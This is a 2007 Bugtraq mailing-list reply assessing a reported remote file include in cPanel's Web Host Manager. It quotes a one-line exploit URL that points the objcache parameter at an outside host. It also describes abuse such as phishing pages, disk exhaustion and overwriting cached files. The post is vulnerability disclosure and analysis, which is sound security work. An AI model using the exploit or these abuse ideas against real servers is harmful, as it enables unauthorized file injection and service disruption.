[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <45CAAF94.8030802@expresshosting.net>
Date: Wed, 07 Feb 2007 23:05:24 -0600
From: Mailinglists Address <mailinglist@...resshosting.net>
To: bugtraq@...urityfocus.com
Subject: Re: remote file include in whm (all version)
ali@...kerz.ir wrote:
> name : web host manager
> vendor : cpanel.net
> by : s3rv3r_hack3r (ali [at] hackerz [dot] ir)
> web-site : www.hackerz.ir - ali.hackerz.ir
> exploit:
> http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?
>
>
I have confirmed that this does in fact work once you are authenticated,
however the default behavior of cpanel is to require the user to
authenticate through a standard http authentication dialog box before
they can access this location. If you click on cancel on the http auth
dialog you are redirected to the login screen instead.
Additionally, some quick testing shows that the included file is not
parsed in any form, it is just passed through to the browser. I suppose
this could be used to trick a user into into submitting their user
information into an official looking form for some basic phishing, but
that is about all I can really see this could be used for.
Some double checking has discovered that if you pass a file to this
location (objcache=http://www.example.com/test.txt) the system will
cache the contents of the test.txt in a file named test.txt located in
/var/cpanel/objcache. A quick thought... that it might be possible to
use a large file to exhaust space in the /var partition (if there was
one) assuming that objcache doesn't do any sort of bounds checking on
the size of the file.
Additionally, it is possible to overwrite existing files in that
directory by matching the name of a file already in that directory. I
was able to replace the contents of the file whmnews with my own content
included via this method.
Tom Walsh
Express Web Systems, Inc.
Powered by blists - more mailing lists